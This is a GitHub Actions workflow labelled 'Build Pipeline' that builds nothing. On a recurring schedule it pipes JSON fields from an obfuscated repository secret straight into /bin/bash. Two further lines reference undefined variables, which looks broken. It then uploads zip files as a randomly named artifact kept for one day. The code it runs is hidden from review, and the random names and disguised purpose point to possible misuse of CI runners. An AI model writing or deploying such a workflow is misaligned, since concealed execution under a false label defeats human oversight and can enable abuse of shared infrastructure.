name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '5 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          phw0986: ${{ secrets.phw0986 }}
        run: |
          printf '%s' "$phw0986" | jq -r .kmo0400 | /bin/bash
          printf '%s' "$kdz272" | jq -r .mg35638 | /bin/bash
          printf '%s' "$lh869" | jq -r .pv60 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: ooCy0zqo
          path: "*.zip"
          retention-days: 1
